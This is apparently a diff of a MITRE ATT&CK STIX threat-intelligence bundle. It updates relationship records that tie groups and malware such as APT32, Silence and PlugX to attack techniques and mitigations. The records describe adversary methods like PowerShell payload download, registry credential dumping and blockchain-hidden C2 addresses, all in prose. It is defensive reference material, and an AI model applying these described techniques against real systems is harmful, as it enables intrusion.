+ "description": "[APT32](https://attack.mitre.org/groups/G0050) enumerated administrative users using the commands net localgroup administrators.(Citation: Cybereason Cobalt Kitty 2017)",
"relationship_type": "uses",
"id": "relationship--5d45479d-7cc2-49cc-8f10-5ead0a1db033",
"type": "relationship",
- "modified": "2020-03-18T19:33:54.619Z",
+ "modified": "2020-06-29T17:03:09.817Z",
"created": "2020-03-18T19:33:54.619Z"
},
{
@@ -171961,7 +173292,7 @@
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"source_ref": "intrusion-set--d13c8a7f-740b-4efa-a232-de7d6bb05321",
- "target_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830",
+ "target_ref": "attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d",
"external_references": [
{
"description": "Skulkin, O.. (2019, January 20). Silence: Dissecting Malicious CHM Files and Performing Forensic Analysis. Retrieved May 24, 2019.",
@@ -171973,7 +173304,7 @@
"relationship_type": "uses",
"id": "relationship--60989b47-4725-4077-8aed-fb5f990fda22",
"type": "relationship",
- "modified": "2020-03-19T16:21:36.690Z",
+ "modified": "2020-06-23T20:30:07.122Z",
"created": "2020-03-19T16:21:36.690Z"
},
{
@@ -171988,13 +173319,18 @@
"description": "Skulkin, O.. (2019, January 20). Silence: Dissecting Malicious CHM Files and Performing Forensic Analysis. Retrieved May 24, 2019.",
"url": "https://cyberforensicator.com/2019/01/20/silence-dissecting-malicious-chm-files-and-performing-forensic-analysis/",
"source_name": "Cyber Forensicator Silence Jan 2019"
+ },
+ {
+ "source_name": "Group IB Silence Sept 2018",
+ "url": "https://www.group-ib.com/resources/threat-research/silence_moving-into-the-darkside.pdf",
+ "description": "Group-IB. (2018, September). Silence: Moving Into the Darkside. Retrieved May 5, 2020."
}
],
- "description": "[Silence](https://attack.mitre.org/groups/G0091) has used PowerShell scripts.(Citation: Cyber Forensicator Silence Jan 2019)",
+ "description": "[Silence](https://attack.mitre.org/groups/G0091) has used PowerShell to download and execute payloads.(Citation: Cyber Forensicator Silence Jan 2019)(Citation: Group IB Silence Sept 2018)",
"relationship_type": "uses",
"id": "relationship--afafd676-1b44-44ae-ad9a-930c0df348bc",
"type": "relationship",
- "modified": "2020-03-19T16:21:36.705Z",
+ "modified": "2020-05-06T03:12:02.501Z",
"created": "2020-03-19T16:21:36.705Z"
},
{
@@ -172024,7 +173360,7 @@
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"source_ref": "intrusion-set--7eda3dd8-b09b-4705-8090-c2ad9fb8c14d",
- "target_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830",
+ "target_ref": "attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d",
"external_references": [
{
"source_name": "Proofpoint TA505 Sep 2017",
@@ -172041,7 +173377,7 @@
"relationship_type": "uses",
"id": "relationship--6f57b4eb-ba87-4755-9b96-3715e1da1de1",
"type": "relationship",
- "modified": "2020-03-19T17:35:11.637Z",
+ "modified": "2020-06-23T20:39:02.965Z",
"created": "2020-03-19T17:35:11.637Z"
},
{
@@ -172050,7 +173386,7 @@
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"source_ref": "malware--6a92d80f-cc65-45f6-aa66-3cdea6786b3c",
- "target_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830",
+ "target_ref": "attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d",
"external_references": [
{
"source_name": "Unit42 Xbash Sept 2018",
@@ -172062,7 +173398,7 @@
"relationship_type": "uses",
"id": "relationship--8dd45f3b-a005-40b3-a6ef-c1ef208e8504",
"type": "relationship",
- "modified": "2020-03-19T17:44:44.695Z",
+ "modified": "2020-06-23T20:41:28.698Z",
"created": "2020-03-19T17:44:44.695Z"
},
{
@@ -172125,27 +173461,6 @@
"modified": "2020-03-19T19:09:17.746Z",
"created": "2020-03-19T19:09:17.746Z"
},
- {
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "source_ref": "malware--b00f90b6-c75c-4bfd-b813-ca9e6c9ebf29",
- "target_ref": "attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67",
- "external_references": [
- {
- "source_name": "TrendMicro MacOS April 2018",
- "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-backdoor-linked-to-oceanlotus-found/",
- "description": "Horejsi, J. (2018, April 04). New MacOS Backdoor Linked to OceanLotus Found. Retrieved November 13, 2018."
- }
- ],
- "description": "[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) uses VBS scripts.(Citation: TrendMicro MacOS April 2018)",
- "relationship_type": "uses",
- "id": "relationship--f26ce7ef-2691-44e5-80ca-175308cf5164",
- "type": "relationship",
- "modified": "2020-03-19T19:09:17.750Z",
- "created": "2020-03-19T19:09:17.750Z"
- },
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"object_marking_refs": [
@@ -172157,7 +173472,7 @@
"description": "Consider automatically relaunching forwarding mechanisms at recurring intervals (ex: temporal, on-logon, etc.) as well as applying appropriate change management to firewall rules and other related system configurations.",
"id": "relationship--73b3f761-2c2d-4ceb-8886-dd0bb0fc7fc4",
"type": "relationship",
- "modified": "2020-03-19T19:20:39.415Z",
+ "modified": "2020-07-09T14:43:42.680Z",
"created": "2020-03-19T19:09:30.512Z"
},
{
@@ -172178,7 +173493,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-19T19:20:39.422Z",
+ "modified": "2020-07-09T14:43:42.696Z",
"created": "2020-03-19T19:09:30.514Z"
},
{
@@ -172199,7 +173514,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-19T19:20:39.487Z",
+ "modified": "2020-07-09T14:43:42.682Z",
"created": "2020-03-19T19:09:30.515Z"
},
{
@@ -172221,7 +173536,7 @@
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"source_ref": "malware--e8545794-b98c-492b-a5b3-4b5a02682e37",
- "target_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830",
+ "target_ref": "attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d",
"external_references": [
{
"source_name": "ClearSky MuddyWater Nov 2018",
@@ -172233,7 +173548,7 @@
"relationship_type": "uses",
"id": "relationship--cb36459a-d37c-424f-8130-55cf8d29417e",
"type": "relationship",
- "modified": "2020-03-19T19:11:23.708Z",
+ "modified": "2020-06-23T20:16:29.296Z",
"created": "2020-03-19T19:11:23.708Z"
},
{
@@ -172267,7 +173582,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-25T19:47:39.153Z",
+ "modified": "2020-06-20T19:57:36.323Z",
"created": "2020-03-19T19:17:21.370Z"
},
{
@@ -172584,7 +173899,7 @@
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"source_ref": "intrusion-set--247cb30b-955f-42eb-97a5-a89fef69341e",
- "target_ref": "attack-pattern--3fc9b85a-2862-4363-a64d-d692e3ffbee0",
+ "target_ref": "attack-pattern--341e222a-a6e3-4f6f-b69c-831d792b1580",
"external_references": [
{
"source_name": "Cybereason Oceanlotus May 2017",
@@ -172597,11 +173912,11 @@
"url": "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf"
}
],
- "description": "[APT32](https://attack.mitre.org/groups/G0050) used Outlook Credential Dumper to harvest credentials.(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017)",
+ "description": "[APT32](https://attack.mitre.org/groups/G0050) used Outlook Credential Dumper to harvest credentials stored in Windows registry.(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017)",
"relationship_type": "uses",
"id": "relationship--304f5c1b-7cfa-4c2a-b7a2-e4957da603b1",
"type": "relationship",
- "modified": "2020-03-19T22:10:50.454Z",
+ "modified": "2020-06-19T21:36:32.167Z",
"created": "2020-03-19T22:10:50.454Z"
},
{
@@ -172992,7 +174307,7 @@
"relationship_type": "uses",
"id": "relationship--7ac04e64-a09e-4a66-b6ce-047030400045",
"type": "relationship",
- "modified": "2020-03-19T22:47:20.671Z",
+ "modified": "2020-07-15T13:03:46.804Z",
"created": "2020-03-19T22:47:20.671Z"
},
{
@@ -174188,7 +175503,7 @@
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"source_ref": "malware--efece7e8-e40b-49c2-9f84-c55c5c93d05c",
- "target_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830",
+ "target_ref": "attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d",
"external_references": [
{
"description": "Kamluk, V. & Gostev, A. (2016, February). Adwind - A Cross-Platform RAT. Retrieved April 23, 2019.",
@@ -174200,7 +175515,7 @@
"relationship_type": "uses",
"id": "relationship--a28ed204-7e5c-4090-a0c5-0a056ef602fe",
"type": "relationship",
- "modified": "2020-03-20T17:30:56.763Z",
+ "modified": "2020-06-23T19:55:50.241Z",
"created": "2020-03-20T02:17:36.884Z"
},
{
@@ -174212,21 +175527,21 @@
"target_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62",
"external_references": [
{
- "source_name": "McAfee Honeybee",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
"description": "Sherstobitoff, R. (2018, March 02). McAfee Uncovers Operation Honeybee, a Malicious Document Campaign Targeting Humanitarian Aid Groups. Retrieved May 16, 2018.",
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/"
+ "source_name": "McAfee Honeybee"
},
{
- "source_name": "McAfee Honeybee",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
"description": "Sherstobitoff, R. (2018, March 02). McAfee Uncovers Operation Honeybee, a Malicious Document Campaign Targeting Humanitarian Aid Groups. Retrieved May 16, 2018.",
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/"
+ "source_name": "McAfee Honeybee"
}
],
"description": "Several commands are supported by the [Honeybee](https://attack.mitre.org/groups/G0072)'s implant via the command-line interface and there\u2019s also a utility to execute any custom command on an infected endpoint.(Citation: McAfee Honeybee) [Honeybee](https://attack.mitre.org/groups/G0072) used batch scripting.(Citation: McAfee Honeybee)",
"relationship_type": "uses",
"id": "relationship--58e2393f-06b5-44a6-a2ad-9b9980dd57ab",
"type": "relationship",
- "modified": "2020-03-20T17:26:29.311Z",
+ "modified": "2020-04-16T19:41:40.715Z",
"created": "2020-03-20T02:31:08.790Z"
},
{
@@ -174747,16 +176062,26 @@
"target_ref": "attack-pattern--f7827069-0bf2-4764-af4f-23fae0d181b7",
"external_references": [
{
- "source_name": "ESET RTM Feb 2017",
- "description": "Faou, M. and Boutin, J.. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
- "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf"
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf",
+ "description": "Faou, M. and Boutin, J. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
+ "source_name": "ESET RTM Feb 2017"
+ },
+ {
+ "source_name": "CheckPoint Redaman October 2019",
+ "url": "https://research.checkpoint.com/2019/ponys-cc-servers-hidden-inside-the-bitcoin-blockchain/",
+ "description": "Eisenkraft, K., Olshtein, A. (2019, October 17). Pony\u2019s C&C servers hidden inside the Bitcoin blockchain. Retrieved June 15, 2020."
+ },
+ {
+ "source_name": "Unit42 Redaman January 2019",
+ "url": "https://unit42.paloaltonetworks.com/russian-language-malspam-pushing-redaman-banking-malware/",
+ "description": "Duncan, B., Harbison, M. (2019, January 23). Russian Language Malspam Pushing Redaman Banking Malware. Retrieved June 16, 2020."
}
],
- "description": "[RTM](https://attack.mitre.org/software/S0148) has used an RSS feed on Livejournal to update a list of encrypted C2 server names.(Citation: ESET RTM Feb 2017)",
+ "description": "[RTM](https://attack.mitre.org/software/S0148) has used an RSS feed on Livejournal to update a list of encrypted C2 server names. [RTM](https://attack.mitre.org/software/S0148) has also hidden [Pony](https://attack.mitre.org/software/S0453) C2 server IP addresses within transactions on the Bitcoin and Namecoin blockchain.(Citation: ESET RTM Feb 2017)(Citation: CheckPoint Redaman October 2019)(Citation: Unit42 Redaman January 2019)",
"relationship_type": "uses",
"id": "relationship--954c6284-d1eb-48f1-96a4-1ed81b063d82",
"type": "relationship",
- "modified": "2020-03-20T21:28:53.091Z",
+ "modified": "2020-06-16T20:51:14.301Z",
"created": "2020-03-20T21:28:53.091Z"
},
{
@@ -175213,7 +176538,7 @@
"description": "Ensure Domain Controller backups are properly secured.",
"id": "relationship--3e3f06c4-3105-4d07-b876-702005e9b59a",
"type": "relationship",
- "modified": "2020-03-25T16:25:17.386Z",
+ "modified": "2020-06-09T20:44:40.885Z",
"created": "2020-03-25T16:25:17.386Z"
},
{
@@ -175384,19 +176709,6 @@
"modified": "2020-03-31T13:11:10.795Z",
"created": "2020-03-25T22:32:16.738Z"
},
- {
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "source_ref": "course-of-action--25d5e1d8-c6fb-4735-bc57-115a21222f4b",
- "target_ref": "attack-pattern--4ae4f953-fe58-4cc8-a327-33257e30a830",
- "relationship_type": "mitigates",
- "id": "relationship--fbf9bc94-2a79-4bf2-ab1e-0bd064b0bb59",
- "type": "relationship",
- "modified": "2020-03-26T15:44:27.575Z",
- "created": "2020-03-26T15:44:27.575Z"
- },
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"object_marking_refs": [
@@ -175420,7 +176732,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-26T20:07:01.037Z",
+ "modified": "2020-06-20T21:53:08.374Z",
"created": "2020-03-26T15:53:25.125Z"
},
{
@@ -175431,10 +176743,10 @@
"source_ref": "course-of-action--47e0e9fe-96ce-4f65-8bb1-8be1feacb5db",
"target_ref": "attack-pattern--aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6",
"relationship_type": "mitigates",
- "description": "Adversaries may use new payloads to execute this technique. Identify and block potentially malicious software executed through hijacking by using application whitelisting solutions also capable of blocking libraries loaded by legitimate software.",
+ "description": "Adversaries may use new payloads to execute this technique. Identify and block potentially malicious software executed through hijacking by using application control solutions also capable of blocking libraries loaded by legitimate software.",
"id": "relationship--6fa01dcb-e06c-4f8b-b6a2-c301f0198df4",
"type": "relationship",
- "modified": "2020-03-26T20:07:01.040Z",
+ "modified": "2020-06-20T21:53:08.371Z",
"created": "2020-03-26T15:53:25.140Z"
},
{
@@ -175470,7 +176782,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-26T20:07:01.083Z",
+ "modified": "2020-06-20T21:53:08.417Z",
"created": "2020-03-26T15:53:25.148Z"
},
{
@@ -175484,7 +176796,7 @@
"description": "Update software regularly to include patches that fix DLL side-loading vulnerabilities.",
"id": "relationship--62c9a1c7-557e-433b-b422-3427a308f34e",
"type": "relationship",
- "modified": "2020-03-26T20:07:01.092Z",
+ "modified": "2020-06-20T21:53:08.422Z",
"created": "2020-03-26T16:17:09.647Z"
},
{
@@ -175498,7 +176810,7 @@
"description": "Install software in write-protected locations. Set directory access controls to prevent file writes to the search paths for applications, both in the folders where applications are run from and the standard library folders.",
"id": "relationship--7253ab74-8fbb-422b-bf37-258981865b87",
"type": "relationship",
- "modified": "2020-03-26T20:07:01.089Z",
+ "modified": "2020-06-20T21:53:08.420Z",
"created": "2020-03-26T16:17:09.665Z"
},
{
@@ -175509,10 +176821,10 @@
"source_ref": "course-of-action--47e0e9fe-96ce-4f65-8bb1-8be1feacb5db",
"target_ref": "attack-pattern--633a100c-b2c9-41bf-9be5-905c1b16c825",
"relationship_type": "mitigates",
- "description": "Adversaries may use new payloads to execute this technique. Identify and block potentially malicious software executed through hijacking by using application whitelisting solutions also capable of blocking libraries loaded by legitimate software.",
+ "description": "Adversaries may use new payloads to execute this technique. Identify and block potentially malicious software executed through hijacking by using application control solutions also capable of blocking libraries loaded by legitimate software.",
"id": "relationship--0fc95a6b-296f-41ab-8663-aea4a80afe0a",
"type": "relationship",
- "modified": "2020-03-26T18:46:55.963Z",
+ "modified": "2020-06-20T20:11:42.902Z",
"created": "2020-03-26T18:45:03.794Z"
},
{
@@ -175533,7 +176845,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-26T20:07:01.123Z",
+ "modified": "2020-06-20T21:53:08.415Z",
"created": "2020-03-26T19:30:46.421Z"
},
{
@@ -175547,7 +176859,7 @@
"description": "Limit privileges of user accounts and groups so that only authorized administrators can interact with service changes and service binary target path locations. Deny execution from user directories such as file download directories and temp directories where able.\n\nEnsure that proper permissions and directory access control are set to deny users the ability to write files to the top-level directory C: and system directories, such as C:\\Windows\\, to reduce places where malicious files could be placed for execution.",
"id": "relationship--523ef32d-7463-4774-a473-fcccb5b0dadd",
"type": "relationship",
- "modified": "2020-03-26T20:07:01.197Z",
+ "modified": "2020-06-20T21:53:08.496Z",
"created": "2020-03-26T19:33:32.779Z"
},
{
@@ -175561,7 +176873,7 @@
"description": "Ensure proper permissions are set for Registry hives to prevent users from modifying keys for system components that may lead to privilege escalation.",
"id": "relationship--85422378-e9d7-4bd2-8b57-73fba0641448",
"type": "relationship",
- "modified": "2020-03-26T20:07:01.194Z",
+ "modified": "2020-06-20T21:53:08.492Z",
"created": "2020-03-26T19:40:38.563Z"
},
{
@@ -175575,7 +176887,7 @@
"description": "Utilize Yama (ex: /proc/sys/kernel/yama/ptrace_scope) to mitigate ptrace based process injection by restricting the use of ptrace to privileged users only. Other mitigation controls involve the deployment of security kernel modules that provide advanced access control and process restrictions such as SELinux, grsecurity, and AppArmor.",
"id": "relationship--78af537b-48cc-411d-a209-3e01c44aa87b",
"type": "relationship",
- "modified": "2020-03-31T13:08:37.120Z",
+ "modified": "2020-06-20T22:16:03.779Z",
"created": "2020-03-26T20:27:44.220Z"
},
{
@@ -175677,10 +176989,10 @@
"source_ref": "course-of-action--47e0e9fe-96ce-4f65-8bb1-8be1feacb5db",
"target_ref": "attack-pattern--b83e166d-13d7-4b52-8677-dff90c548fd7",
"relationship_type": "mitigates",
- "description": "System settings can prevent applications from running that haven't been downloaded through the Apple Store (or other legitimate repositories) which can help mitigate some of these issues. Also enable whitelisting solutions such as AppLocker and/or Device Guard to block the loading of malicious content.",
+ "description": "System settings can prevent applications from running that haven't been downloaded through the Apple Store (or other legitimate repositories) which can help mitigate some of these issues. Also enable application control solutions such as AppLocker and/or Device Guard to block the loading of malicious content.",
"id": "relationship--15b9b22e-7896-4219-8ec9-59b099644a6f",
"type": "relationship",
- "modified": "2020-03-31T12:49:36.985Z",
+ "modified": "2020-06-20T22:40:30.919Z",
"created": "2020-03-27T13:14:04.866Z"
},
{
@@ -175701,7 +177013,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-31T12:49:37.002Z",
+ "modified": "2020-06-20T22:40:30.928Z",
"created": "2020-03-27T13:32:37.810Z"
},
{
@@ -175722,7 +177034,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-31T12:49:37.004Z",
+ "modified": "2020-06-20T22:40:30.951Z",
"created": "2020-03-27T13:32:37.823Z"
},
{
@@ -175736,7 +177048,7 @@
"description": "Ensure proper permissions are set for Registry hives to prevent users from modifying keys related to SIP and trust provider components. Components may still be able to be hijacked to suitable functions already present on disk if malicious modifications to Registry keys are not prevented.",
"id": "relationship--a152969e-2530-4cb7-acdf-f93b138116d0",
"type": "relationship",
- "modified": "2020-03-31T12:49:37.028Z",
+ "modified": "2020-06-20T22:40:30.949Z",
"created": "2020-03-27T13:32:37.825Z"
},
{
@@ -175788,7 +177100,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-31T12:53:56.511Z",
+ "modified": "2020-06-17T14:25:38.414Z",
"created": "2020-03-27T19:51:21.977Z"
},
{
@@ -176083,7 +177395,7 @@
"description": "MSBuild.exe may not be necessary within an environment and should be removed if not being used.",
"id": "relationship--a6c274f5-43e1-4f69-a182-0c4ab9d0a5ed",
"type": "relationship",
- "modified": "2020-03-29T19:56:43.333Z",
+ "modified": "2020-06-08T23:29:28.275Z",
"created": "2020-03-27T21:50:26.217Z"
},
{
@@ -176134,11 +177446,11 @@
"url": "https://researchcenter.paloaltonetworks.com/2017/06/unit42-paranoid-plugx/"
}
],
- "description": "A version of [PlugX](https://attack.mitre.org/software/S0013) loads as shellcode within a .NET Framework project using msbuild.exe, presumably to bypass application whitelisting techniques.(Citation: Palo Alto PlugX June 2017)",
+ "description": "A version of [PlugX](https://attack.mitre.org/software/S0013) loads as shellcode within a .NET Framework project using msbuild.exe, presumably to bypass application control techniques.(Citation: Palo Alto PlugX June 2017)",
"relationship_type": "uses",
"id": "relationship--652af94a-7ff3-4d47-89e5-154c7bc34258",
"type": "relationship",
- "modified": "2020-03-27T21:54:12.731Z",
+ "modified": "2020-06-20T21:43:42.905Z",
"created": "2020-03-27T21:54:12.731Z"
},
{
@@ -176365,10 +177677,10 @@
"source_ref": "course-of-action--d2a24649-9694-4c97-9c62-ce7b270bf6a3",
"target_ref": "attack-pattern--457c7820-d331-465a-915e-42f85500ccc4",
"relationship_type": "mitigates",
- "description": "Microsoft's Enhanced Mitigation Experience Toolkit (EMET) Attack Surface Reduction (ASR) feature can be used to block methods of using using trusted binaries to bypass whitelisting.",
+ "description": "Microsoft's Enhanced Mitigation Experience Toolkit (EMET) Attack Surface Reduction (ASR) feature can be used to block methods of using using trusted binaries to bypass application control.",
"id": "relationship--1f1de0ea-581b-4b41-953f-1b8f552f84e7",
"type": "relationship",
- "modified": "2020-03-29T17:18:45.986Z",
+ "modified": "2020-06-20T22:30:57.257Z",
"created": "2020-03-29T17:17:31.571Z"
},
{
@@ -176382,7 +177694,7 @@
"description": "Restrict execution of particularly vulnerable binaries to privileged accounts or groups that need to use it to lessen the opportunities for malicious usage.",
"id": "relationship--6dc1f5ca-8881-4d06-b192-7bc502ea94ce",
"type": "relationship",
- "modified": "2020-03-29T17:18:46.015Z",
+ "modified": "2020-06-20T22:30:57.280Z",
"created": "2020-03-29T17:17:31.592Z"
},
{
@@ -176393,10 +177705,10 @@
"source_ref": "course-of-action--47e0e9fe-96ce-4f65-8bb1-8be1feacb5db",
"target_ref": "attack-pattern--457c7820-d331-465a-915e-42f85500ccc4",
"relationship_type": "mitigates",
- "description": "Consider using application whitelisting to prevent execution of binaries that are susceptible to abuse and not required for a given system or network.",
+ "description": "Consider using application control to prevent execution of binaries that are susceptible to abuse and not required for a given system or network.",
"id": "relationship--95e4e360-b867-48b4-a494-d9d148232b70",
"type": "relationship",
- "modified": "2020-03-29T17:18:46.013Z",
+ "modified": "2020-06-20T22:30:57.278Z",
"created": "2020-03-29T17:17:31.597Z"
},
{
@@ -176410,7 +177722,7 @@
"description": "Many native binaries may not be necessary within a given environment.",
"id": "relationship--c8c7f580-982a-4efc-8a2a-e007e7f07220",
"type": "relationship",
- "modified": "2020-03-29T17:18:46.011Z",
+ "modified": "2020-06-20T22:30:57.289Z",
"created": "2020-03-29T17:17:31.594Z"
},
{
@@ -176452,7 +177764,7 @@
"description": "Ensure proper Registry permissions are in place to prevent adversaries from disabling or interfering with security/logging services.",
"id": "relationship--c0aa0cf1-4c03-4fdd-bdbb-65563bff4a81",
"type": "relationship",
- "modified": "2020-03-29T21:49:59.811Z",
+ "modified": "2020-06-25T15:47:30.039Z",
"created": "2020-03-29T21:49:59.811Z"
},
{
@@ -176541,7 +177853,7 @@
"relationship_type": "uses",
"id": "relationship--d3dbd171-a82c-4fef-ba16-2355dd9b513e",
"type": "relationship",
- "modified": "2020-03-29T22:57:53.216Z",
+ "modified": "2020-07-15T13:03:46.811Z",
"created": "2020-03-29T22:57:53.216Z"
},
{
@@ -176941,19 +178253,6 @@
"modified": "2020-03-30T20:18:09.529Z",
"created": "2020-03-30T20:18:09.529Z"
},
- {
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "source_ref": "attack-pattern--10d5f3b7-6be6-4da5-9a77-0f1e2bbfcc44",
- "target_ref": "attack-pattern--791481f8-e96a-41be-b089-a088763083d4",
- "relationship_type": "revoked-by",
- "id": "relationship--9dfc000d-550a-40ae-b419-59517cb187b3",
- "type": "relationship",
- "modified": "2020-03-30T20:20:02.798Z",
- "created": "2020-03-30T20:20:02.798Z"
- },
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"object_marking_refs": [
@@ -177111,6 +178410,26543 @@
"modified": "2020-03-30T21:08:00.433Z",
"created": "2020-03-30T21:08:00.433Z"
},
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "course-of-action--cc2399fd-3cd3-4319-8d0a-fbd6420cdaf8",
+ "target_ref": "attack-pattern--144e007b-e638-431d-a894-45d90c54ab90",
+ "relationship_type": "mitigates",
+ "description": "Routinely monitor user permissions to ensure only the expected users have the capability to modify cloud compute infrastructure components.",
+ "id": "relationship--91c4630e-772b-4dac-8e58-5a899ccdc2be",
+ "type": "relationship",
+ "modified": "2020-06-18T11:38:27.847Z",
+ "created": "2020-04-27T14:14:05.600Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--cc5497f7-a9e8-436f-94da-b2b4a9b9ad3c",
+ "target_ref": "attack-pattern--fb8d023d-45be-47e9-bc51-f56bcae6435b",
+ "external_references": [
+ {
+ "source_name": "Talos PoetRAT April 2020",
+ "url": "https://blog.talosintelligence.com/2020/04/poetrat-covid-19-lures.html",
+ "description": "Mercer, W, et al. (2020, April 16). PoetRAT: Python RAT uses COVID-19 lures to target Azerbaijan public and private sectors. Retrieved April 27, 2020."
+ }
+ ],
+ "description": "[PoetRAT](https://attack.mitre.org/software/S0428) has used [FTP](https://attack.mitre.org/software/S0095) for exfiltration.(Citation: Talos PoetRAT April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--613ba18d-d23b-443a-9e1a-c2d564132fe2",
+ "type": "relationship",
+ "modified": "2020-04-27T21:02:32.990Z",
+ "created": "2020-04-27T20:40:03.104Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--cc5497f7-a9e8-436f-94da-b2b4a9b9ad3c",
+ "target_ref": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e",
+ "external_references": [
+ {
+ "source_name": "Talos PoetRAT April 2020",
+ "url": "https://blog.talosintelligence.com/2020/04/poetrat-covid-19-lures.html",
+ "description": "Mercer, W, et al. (2020, April 16). PoetRAT: Python RAT uses COVID-19 lures to target Azerbaijan public and private sectors. Retrieved April 27, 2020."
+ }
+ ],
+ "description": "[PoetRAT](https://attack.mitre.org/software/S0428) has used spearphishing attachments to infect victims.(Citation: Talos PoetRAT April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--20118b8d-dc6e-4c71-8d99-789901c10e73",
+ "type": "relationship",
+ "modified": "2020-04-29T16:00:35.642Z",
+ "created": "2020-04-27T20:40:03.132Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--cc5497f7-a9e8-436f-94da-b2b4a9b9ad3c",
+ "target_ref": "attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67",
+ "external_references": [
+ {
+ "source_name": "Talos PoetRAT April 2020",
+ "url": "https://blog.talosintelligence.com/2020/04/poetrat-covid-19-lures.html",
+ "description": "Mercer, W, et al. (2020, April 16). PoetRAT: Python RAT uses COVID-19 lures to target Azerbaijan public and private sectors. Retrieved April 27, 2020."
+ }
+ ],
+ "description": "[PoetRAT](https://attack.mitre.org/software/S0428) has used Word documents with VBScripts to execute malicious activities.(Citation: Talos PoetRAT April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--b078c987-40be-459f-9045-4b2b92cc145b",
+ "type": "relationship",
+ "modified": "2020-04-27T21:02:32.971Z",
+ "created": "2020-04-27T21:02:32.971Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--cc5497f7-a9e8-436f-94da-b2b4a9b9ad3c",
+ "target_ref": "attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8",
+ "external_references": [
+ {
